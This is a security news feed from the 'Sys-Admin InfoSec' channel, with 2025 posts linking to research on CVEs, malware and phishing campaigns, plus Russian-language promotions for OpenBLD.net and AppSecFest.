Sys-Admin InfoSec

22 апреля 2025 09:23

CVE-2025-24054, NTLM Exploit in the Wild

CVE-2025-24054 is a vulnerability related to NTLM hash disclosure via spoofing, which can be exploited using a maliciously crafted .library-ms

CVE-2025-24054, which also allows NTLM hash disclosure with very little user interaction. For CVE-2025-24054, users can trigger the attack simply by right-clicking or navigating to the folder that holds the maliciously crafted .library-ms file...

Research:

https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/

Sys-Admin InfoSec

16 апреля 2025 11:59

🎉 OpenBLD.net на AppSecFest 2025!

25 апреля встречаемся на AppSecFest 2025 — крупнейшем событии года в мире прикладной безопасности.

В этом году организаторы второй год подряд поддерживают OpenBLD.net — и это чертовски приятно!

У нас будет собственная стилизованная стойка, экран для демонстрации технологий, а логотип OpenBLD.net появится на официальном сайте фестиваля. Это действительное признание того, что мы делаем действительно важное дело 💪

Что будет на нашем стенде:

• Футболки и стикеры
• Живые демки технологий OpenBLD.net
• А самое главное — возможность пообщаться, обсудить идеи, задать вопросы и вдохновиться

Если вы интересуетесь DNS-безопасностью, фильтрацией вредоносных доменов, приватностью и киберзащитой — обязательно загляните к нам. Увидимся на AppSecFest 2025!

• Подробнее о проекте: openbld.net
• О фестивале: appsecfest.kz

P.S. И да, дорогой друг — у тебя есть шанс попасть на мероприятие вместе с нашей командой 😉

Sys-Admin InfoSec

08 апреля 2025 12:07

Threat actors leverage tax season to deploy tax-themed phishing campaigns

https://www.microsoft.com/en-us/security/blog/2025/04/03/threat-actors-leverage-tax-season-to-deploy-tax-themed-phishing-campaigns/

Sys-Admin InfoSec

03 апреля 2025 13:28

wsrp4echo - 0day Chain Vulnerability

Web Services for Remote Portlets (WSRP) is an OASIS-approved network protocol standard designed for communications with remote portlets. Uses in:

- Oracle WebCenter
- IBM WebSphere
- Microsoft SharePoint

aryanchehreghani/wsrp4echo-0day-chain-vulnerability-fd2c395dc45b" rel="nofollow">https://medium.com/@aryanchehreghani/wsrp4echo-0day-chain-vulnerability-fd2c395dc45b

P.S. Thx Reaza for the link 🤝

Sys-Admin InfoSec

31 марта 2025 09:33

Exposing Crocodilus: New Device Takeover Malware Targeting Android Devices

Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging. This report explores the features of Crocodilus, its links to known threat actors, and how it lures victims into helping the malware steal their own credentials:

https://www.threatfabric.com/blogs/exposing-crocodilus-new-device-takeover-malware-targeting-android-devices

Sys-Admin InfoSec

26 марта 2025 13:29

Melting Pot of macOS Malware Adds Go to Crystal, Nim and Rust Variants

https://www.sentinelone.com/blog/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/

Sys-Admin InfoSec

19 марта 2025 08:51

Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns

https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html

Sys-Admin InfoSec

13 марта 2025 08:48

StopRansomware: Medusa Ransomware

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a

Sys-Admin InfoSec

06 марта 2025 03:46

Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS Systems

https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader

Sys-Admin InfoSec

27 февраля 2025 03:18

Massive Botnet Targets M365 with Stealthy Password Spraying Attacks

https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/

Sys-Admin InfoSec

20 февраля 2025 11:39

New variant of the Snake Keylogger (also known as 404 Keylogger)

https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant

Sys-Admin InfoSec

19 февраля 2025 12:19

LLMjacking targets DeepSeek

https://sysdig.com/blog/llmjacking-targets-deepseek

Sys-Admin InfoSec

18 февраля 2025 11:43

🧠 OpenBLD.net - ML Predictive Balancing Coming

This is undoubtedly an innovation. OpenBLD.net smart balancing service is now a separate project, introducing key features:

► Detects slow servers before they start lagging
► If an upstream server shows an increase in timeouts or errors → ML predicts potential failures and automatically prepares backup routes before the infrastructure starts "firing"
► Based on historical data, ML knows when servers experience peak loads (e.g., during lunch hours or at the end of the workday)
► Instead of reacting to downtime, it distributes traffic efficiently in advance
► Reduces latency and timeouts by proactively optimizing traffic distribution
► And much more, including environmental factors such as server energy consumption optimization

The balancer operates like a living organism, learning and adapting to conditions on its own)

How does this benefit users?

🚀 More autonomy and focus on your own development.
⚡ More speed.

📢 This week, the updated balancers will be seamlessly integrated into ADA’s infrastructure—the only thing you might notice is the increased speed.

✌️ Stay fast, stay optimized!

Sys-Admin InfoSec

10 февраля 2025 19:11

Weaponizing Background Images for Information Disclosure && LPE: AnyDesk CVE-2024-12754, ZDI-24-1711

https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754

Sys-Admin InfoSec

05 февраля 2025 06:31

Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2025-21293)

https://birkep.github.io/posts/Windows-LPE/

Sys-Admin InfoSec

17 апреля 2025 06:22

MITRE Ends? US Geoverment ends support MITRE. CVE released emergency article about it:

https://www.thecvefoundation.org/home

Letter:

https://www.linkedin.com/posts/tib3rius_breaking-from-a-reliable-source-mitre-activity-7317960862332293120-t6yt

Sys-Admin InfoSec

15 апреля 2025 05:18

Incomplete NVIDIA Patch to CVE-2024-0132 Exposes AI Infrastructure and Data to Critical Risks

https://www.trendmicro.com/en_us/research/25/d/incomplete-nvidia-patch.html

Sys-Admin InfoSec

03 апреля 2025 21:20

ImageRunner: A Privilege Escalation Vulnerability Impacting GCP Cloud Run

https://www.tenable.com/blog/imagerunner-a-privilege-escalation-vulnerability-impacting-gcp-cloud-run

Sys-Admin InfoSec

02 апреля 2025 13:11

Fileless cryptominer targeting exposed PostgreSQL with over 1.5K victims

https://www.wiz.io/blog/postgresql-cryptomining

Sys-Admin InfoSec

27 марта 2025 10:38

Have I Been Pwned owner Troy Hunt’s mailing list compromised in phishing attack

https://www.itpro.com/security/phishing/have-i-been-pwned-owner-troy-hunts-mailing-list-compromised-in-phishing-attack

Sys-Admin InfoSec

20 марта 2025 17:05

Technical Explanation of NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File

https://cti.monster/blog/2025/03/18/CVE-2025-24071.html

Sys-Admin InfoSec

18 марта 2025 08:07

GitHub Actions - tj-actions/changed-files action is compromised

The tj-actions/changed-files GitHub Action, which is currently used in over 23,000 repositories, has been compromised. In this attack, the attackers modified the action’s code and retroactively updated multiple version tags to reference the malicious commit...

https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised

Sys-Admin InfoSec

11 марта 2025 09:58

Mass Exploitation of Critical PHP-CGI Vulnerability (CVE-2024-4577), Signaling Broad Campaign

Analysys:

https://blog.talosintelligence.com/new-persistent-attacks-japan/

Sys-Admin InfoSec

28 февраля 2025 13:06

Auto-Color: An Emerging and Evasive Linux Backdoor

https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/

Sys-Admin InfoSec

26 февраля 2025 15:39

Android trojan TgToxic updates its capabilities

..TgToxic is an Android banking trojan discovered by Trend Micro in July 2022. It’s designed to steal user credentials, cryptocurrency from digital wallets and funds from banking and finance apps.

The actors once again changed the way the malware obtains the C2 URL, from a dead drop location to a domain generation algorithm (DGA)..:

https://intel471.com/blog/android-trojan-tgtoxic-updates-its-capabilities

Sys-Admin InfoSec

20 февраля 2025 07:37

♾ AppSecFest - 25 апреля в Алматы. CFP.

Который год AppSecFest.kz радует контентом, организацией, масштабом. Организаторы настроены на серъезный контент, аудиторию и содержание.

Добрая атмосфера для всех, а + для докладчиков возможность рассказать о своих ресерчах, достижениях в области разработки и защите приложений.

Пока сайт конфы делается, организаторы организуются - ведется CFP набор заявок на доклады связанные с:

- Mobile, Web, X-Platform, Frontend/Backend, Microservices, Docker/K8s, Blockchain, AI, ML
- DevOps, CI/CD, Agile, UI/UX, качеством и безопасностью кода
- SAST, DAST, IAST, API, IaC, Cloud Security, Pentesting, SDLC, DevSecOps, Vulnerability Management

Подать спикер-заявку - https://appsecfest.kz

Sys-Admin InfoSec

18 февраля 2025 18:59

Vgod RANSOMWARE

The ransomware specifically targets Windows systems using advanced encryption techniques, appending a unique file extension to encrypted files...

https://www.cyfirma.com/research/vgod-ransomware

Sys-Admin InfoSec

13 февраля 2025 08:44

Leaking the email of any YouTube user for $10,000

https://brutecat.com/articles/leaking-youtube-emails

Sys-Admin InfoSec

07 февраля 2025 06:07

Mobile Indian Cyber Heist: FatBoyPanel And His Massive Data Breach

https://www.zimperium.com/blog/mobile-indian-cyber-heist-fatboypanel-and-his-massive-data-breach/

Sys-Admin InfoSec

03 февраля 2025 11:43

Unauthorized Data Upload in Alibaba Cloud Object Storage Service

muhammadwaseem29/unauthorized-data-upload-in-alibaba-cloud-object-storage-service-cefa6abcef7f" rel="nofollow">https://medium.com/@muhammadwaseem29/unauthorized-data-upload-in-alibaba-cloud-object-storage-service-cefa6abcef7f